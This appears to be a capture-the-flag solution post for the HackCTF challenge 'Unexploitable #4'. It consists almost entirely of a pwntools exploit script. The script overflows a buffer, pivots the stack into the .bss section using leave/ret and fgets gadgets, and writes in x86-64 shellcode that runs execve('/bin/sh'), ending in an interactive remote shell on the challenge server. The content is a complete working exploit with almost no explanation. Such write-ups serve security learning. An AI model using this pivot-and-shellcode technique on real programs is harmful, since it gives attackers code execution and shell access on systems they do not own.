[HackCTF]Unexploitable #4

• stack pivot

exploit.py

from pwn import *

context.log_level = 'debug'
context.arch = 'amd64'
e = ELF('./Unexploitable_4')
# p = process('./Unexploitable_4')
p = remote('ctf.j0n9hyun.xyz',3039)
bss = 0x601500
leave_ret = 0x00000000004006F8
fgets = 0x00000000004006DB

pause()

s = asm('''
xor rax,rax;
xor rdx,rdx;
xor rsi,rsi;
mov rbx,0x1068732f6e69622f;
push rbx;
mov [rsp+7],al;
mov rdi,rsp;
mov al,0x3b;
syscall;
''')

pay = 'A'*0x10
pay += p64(bss) # sfp
pay += p64(fgets) # ret
p.sendline(pay)

pay = 'A'*0x10
pay += p64(bss+40)
pay += p64(fgets)
pay += s[:8]
p.sendline(pay)

pay = s[8:] + '\x90'
pay += p64(0x601510)
p.sendline(pay)

p.interactive()